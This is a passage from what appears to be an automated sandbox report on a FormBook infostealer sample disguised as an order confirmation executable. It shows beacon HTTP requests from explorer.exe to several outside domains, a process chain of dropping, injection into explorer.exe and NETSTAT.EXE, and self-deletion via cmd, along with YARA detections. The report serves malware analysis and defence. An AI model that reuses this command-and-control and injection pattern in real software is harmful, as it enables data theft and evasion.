                                                                                                                                                        Content-Length: 163
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 75 72 70 6f 73 65 6c 79 70 72 6f 64 75 63 74 69 76 65 6c 61 62 2e 63 6f 6d 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 48 39 65 46 4b 50 54 33 50 5a 36 2b 4a 45 75 6b 6d 6f 6c 34 49 61 6b 4d 37 52 6e 31 62 54 59 49 37 64 61 33 41 51 68 45 6d 5a 4f 54 77 74 58 66 6b 34 63 34 67 57 58 66 75 63 33 74 37 32 53 6d 55 36 65 66 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                        Data Ascii: <a href="https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&amp;VPXh=GhIH">Moved Permanently</a>.


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        7192.168.2.5497403.0.139.11480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:29.565974951 CET5356OUTGET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.ekpays.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:29.750543118 CET5356INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:29 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 154
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        8192.168.2.54974134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:39.913343906 CET5357OUTGET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.beachesvr.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:40.054193974 CET5358INHTTP/1.1 403 Forbidden
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:39 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 275
                                                                                                                                                        ETag: "600b4d16-113"
                                                                                                                                                        Via: 1.1 google
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        9192.168.2.549742192.249.115.16880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:45.429397106 CET5360OUTGET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.secretlairtoys.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:45.696475029 CET5361INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:45 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Set-Cookie: PHPSESSID=719593c0217835c75a4268d80b73ca25; path=/; domain=.secretlairtoys.com
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE,OPTIONS
                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: 0
                                                                                                                                                        Connection: close
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 33 64 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 20 2d 20 53 68 6f 70 20 66 6f 72 20 74 6f 79 73 2c 20 6e 6f 74 20 61 64 73 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 21 2d 2d 20 53 45 4f 20 4d 65 74 61 20 54 61 67 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 72 74 7a 69 6c 6c 61 20 2d 20 42 6f 6f 74 73 74 72 61 70 20 45 2d 63 6f 6d 6d 65 72 63 65 20 54 65 6d 70 6c 61 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6f 6f 74 73 74 72 61 70 2c 20 73 68 6f 70 2c 20 65 2d 63 6f 6d 6d 65 72 63 65 2c 20 6d 61 72 6b 65 74 2c 20 6d 6f 64 65 72 6e 2c 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 20 62 75 73 69 6e 65 73 73 2c 20 6d 6f 62 69 6c 65 2c 20 62 6f 6f 74 73 74 72 61 70 20 34 2c 20 68 74 6d 6c 35 2c 20 63 73 73 33 2c 20 6a 71 75 65 72 79 2c 20 6a 73 2c 20 67 61 6c 6c 65 72 79 2c 20 73 6c 69 64 65 72 2c 20 74 6f 75 63 68 2c 20 63 72 65 61 74 69 76 65 2c 20 63 6c 65 61 6e 22 3e 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 22 3e 0a 20 20 3c 21 2d 2d 20 56 69 65 77 70 6f 72 74 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 61 6e 64 20 54 6f 75 63 68 20 49 63 6f 6e 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
                                                                                                                                                        Data Ascii: 3d8c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Toy-Aisle.com - Shop for toys, not ads.</title> ... SEO Meta Tags--> ... <meta name="description" content="Cartzilla - Bootstrap E-commerce Template"> <meta name="keywords" content="bootstrap, shop, e-commerce, market, modern, responsive, business, mobile, bootstrap 4, html5, css3, jquery, js, gallery, slider, touch, creative, clean"> --> <meta name="author" content="Toy-Aisle.com"> ... Viewport--> <meta name="viewport" content="width=device-width, initial-scale=1"> ... Favicon and Touch Icons--> ... <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="ico


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        Analysis Process: Order confirmation 64236000000025 26.01.2021.exe PID: 4588 Parent PID: 5576

                                                                                                                                                        General

                                                                                                                                                        Start time:15:38:52
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe'
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:596473 bytes
                                                                                                                                                        MD5 hash:B18E939428B3FFC67C750E2A0988D61A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low

                                                                                                                                                        Analysis Process: lqqebhptsg.exe PID: 5064 Parent PID: 4588

                                                                                                                                                        General

                                                                                                                                                        Start time:15:38:53
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
                                                                                                                                                        Imagebase:0xb30000
                                                                                                                                                        File size:893608 bytes
                                                                                                                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 5%, Metadefender, Browse
                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        Analysis Process: 9rd1hxro.exe PID: 5732 Parent PID: 5064

                                                                                                                                                        General

                                                                                                                                                        Start time:15:38:55
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:893608 bytes
                                                                                                                                                        MD5 hash:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 5732

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:00
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: NETSTAT.EXE PID: 1284 Parent PID: 3472

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:14
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                        File size:32768 bytes
                                                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        Analysis Process: cmd.exe PID: 6352 Parent PID: 1284

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:18
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
                                                                                                                                                        Imagebase:0x140000
                                                                                                                                                        File size:232960 bytes
                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: conhost.exe PID: 6360 Parent PID: 6352

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:19
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >